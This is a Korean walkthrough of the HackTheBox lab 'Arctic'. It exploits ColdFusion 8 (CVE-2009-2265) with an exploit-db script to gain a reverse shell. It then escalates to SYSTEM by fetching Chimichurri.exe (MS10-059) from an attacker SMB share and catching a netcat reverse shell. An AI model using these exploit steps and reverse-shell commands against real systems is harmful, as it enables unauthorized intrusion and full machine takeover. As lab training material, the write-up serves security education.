1. Recon
1.1. nmap
┌──(root㉿kali)-[/home/kali/labs]
└─# nmap -sC -sV 10.129.53.229 --max-retries 1 --min-rate 5000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-04 23:26 +04
Nmap scan report for 10.129.53.229
Host is up (0.19s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open http JRun Web Server
|_http-title: Index of /
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 166.41 seconds
1.2. 웹 정찰
8500번 포트가 개방돼 있고, Web Server 라고 설명이 있기에 접근해서 살펴본다. 그 중에 CFIDE 를 탐색한다.
해당 폴더 내부에 administrator 가 있는데, 접근해 보면 ADOBE COLDFUSION 8 이라는 거를 사용한다.
2. 내부망 침투
2.1. searchsploit 으로 취약점 검색
searchsploit 으로 coldfusion 으로 검색해 보니 version 8 에 해당하는 거에 RCE 취약점이 존재하는 것을 확인할 수 있다.
┌──(root㉿kali)-[/home/kali/labs]
└─# searchsploit coldfusion
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting | cfm/webapps/36067.txt
Adobe ColdFusion - Directory Traversal | multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal (Metasploit) | multiple/remote/16985.rb
Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE) | windows/remote/50781.txt
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution | windows/remote/43993.py
Adobe ColdFusion 2018 - Arbitrary File Upload | multiple/webapps/45979.txt
Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting | cfm/webapps/29567.txt
Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities | cfm/webapps/36172.txt
Adobe ColdFusion 8 - Remote Command Execution (RCE) | cfm/webapps/50057.py
Adobe ColdFusion 9 - Administrative Authentication Bypass | windows/webapps/27755.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit) | multiple/remote/30210.rb
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection | multiple/webapps/40346.py
Adobe ColdFusion APSB13-03 - Remote Multiple Vulnerabilities (Metasploit) | multiple/remote/24946.rb
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting | cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting | cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting | cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting | cfm/webapps/33168.txt
Adobe ColdFusion versions 2018_15 (and earlier) and 2021_5 and earlier - Arbitrary File Read | multiple/webapps/51875.py
Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution | multiple/remote/19093.txt
Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages | windows/local/19220.c
Allaire ColdFusion Server 4.0/4.0.1 - 'CFCACHE' Information Disclosure | multiple/remote/19712.txt
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | cfm/webapps/16788.rb
ColdFusion 9-10 - Credential Disclosure | multiple/webapps/25305.py
ColdFusion MX - Missing Template Cross-Site Scripting | cfm/remote/21548.txt
ColdFusion MX - Remote Development Service | windows/remote/50.pl
ColdFusion Scripts Red_Reservations - Database Disclosure | asp/webapps/7440.txt
ColdFusion Server 2.0/3.x/4.x - Administrator Login Password Denial of Service | multiple/dos/19996.txt
Macromedia ColdFusion MX 6.0 - Error Message Full Path Disclosure | cfm/webapps/22544.txt
Macromedia ColdFusion MX 6.0 - Oversized Error Message Denial of Service | multiple/dos/24013.txt
Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure | multiple/remote/22867.pl
Macromedia ColdFusion MX 6.0 - SQL Error Message Cross-Site Scripting | cfm/webapps/23256.txt
Macromedia ColdFusion MX 6.1 - Template Handling Privilege Escalation | multiple/remote/24654.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
해당 파일을 가져온다.
┌──(root㉿kali)-[/home/kali/labs]
└─# searchsploit -m 50057.py
Exploit: Adobe ColdFusion 8 - Remote Command Execution (RCE)
URL: https://www.exploit-db.com/exploits/50057
Path: /usr/share/exploitdb/exploits/cfm/webapps/50057.py
Codes: CVE-2009-2265
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/labs/50057.py
2.2. python 코드 수정
해당 파이썬 파일 내부를 보면 공격할 IP/PORT 와 Listen 할 IP/PORT 를 작성하는 곳이 있다.
[...SNIP...]
if __name__ == '__main__':
# Define some information
lhost = '10.10.14.143'
lport = 4444
rhost = "10.129.53.229"
rport = 8500
filename = uuid.uuid4().hex
[...SNIP...]
2.3. 쉘 획득
그리고 파이썬을 작동 시키면 쉘을 획득할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Arctic]
└─# python 50057.py
Generating a payload...
Payload size: 1498 bytes
Saved as: e2e826d5560f4f718ae64426782dbb4b.jsp
Priting request...
Content-type: multipart/form-data; boundary=0124ba0d31ae40e1a659c1645b48f490
Content-length: 1699
[...SNIP...]
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis
그리고 user.txt 를 통해서 flag 획득 가능.
C:\Users>cd tolis
cd tolis
C:\Users\tolis>cd Desktop
cd Desktop
C:\Users\tolis\Desktop>type user.txt
type user.txt
3. 권한 상승
3.1. 권한 확인
SeImpersonatePrivilege 권한이 눈에 띈다. 대표적인 Potato 공격 중 하나가 먹힐 수 있을 것으로 예상된다.
C:\Users\tolis\Desktop>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\Users\tolis\Desktop>whoami /groups
whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288 Mandatory group, Enabled by default, Enabled group
3.2. PrintSpoofer 이용 공격 - 실패
대표적인 Potato 공격 중 하나인 PrintSpoofer 를 시험삼아 돌려봤지만 정상 작동하지 않았다.
C:\Users\tolis\Documents>copy \\10.10.14.143\share\PrintSpoofer64.exe .
copy \\10.10.14.143\share\PrintSpoofer64.exe .
1 file(s) copied.
C:\Users\tolis\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5C03-76A8
Directory of C:\Users\tolis\Documents
06/01/2026 05:53 �� <DIR> .
06/01/2026 05:53 �� <DIR> ..
04/01/2026 09:48 �� 27.136 PrintSpoofer64.exe
1 File(s) 27.136 bytes
2 Dir(s) 1.432.952.832 bytes free
C:\Users\tolis\Documents>.\PrintSpoofer64.exe
.\PrintSpoofer64.exe
3.3. systeminfo 살피기
systeminfo 명령어를 사용해서 운영체제 버전을 확인한다. 그 중에 Windows Server 2008 R2 에 해당하는 것을 확인했다.
C:\Users\tolis\Documents>systeminfo
systeminfo
Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45 ��
System Boot Time: 6/1/2026, 5:20:26 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 6.143 MB
Available Physical Memory: 5.056 MB
Virtual Memory: Max Size: 12.285 MB
Virtual Memory: Available: 11.228 MB
Virtual Memory: In Use: 1.057 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 10.10.10.2
IP address(es)
[01]: 10.129.53.229
3.4. Chimichurri 이용
해당 Windows 버전은 MS10-059 취약점을 내포하고 있고, 이를 트리거 할 수 있는 취약점이 존재한다. smbserver 를 이용해서 Chimichurri.exe 파일을 다운받는다.
사용법은 간단하게 내 Kali IP 와 포트를 지정하면 리버스 쉘로 연결을 해 준다.
C:\Users\tolis\Documents>copy \\10.10.14.143\share\Chimichurri.exe .
copy \\10.10.14.143\share\Chimichurri.exe .
1 file(s) copied.
C:\Users\tolis\Documents>.\Chimichurri.exe
.\Chimichurri.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
C:\Users\tolis\Documents>.\Chimichurri.exe 10.10.14.143 443
.\Chimichurri.exe 10.10.14.143 443
그걸 통해서 SYSTEM 권한을 획득할 수 있다.
┌──(root㉿kali)-[/home/kali]
└─# rlwrap -cAr nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.53.229] 49400
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\tolis\Documents>whoami
whoami
nt authority\system
C:\Users\tolis\Documents>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt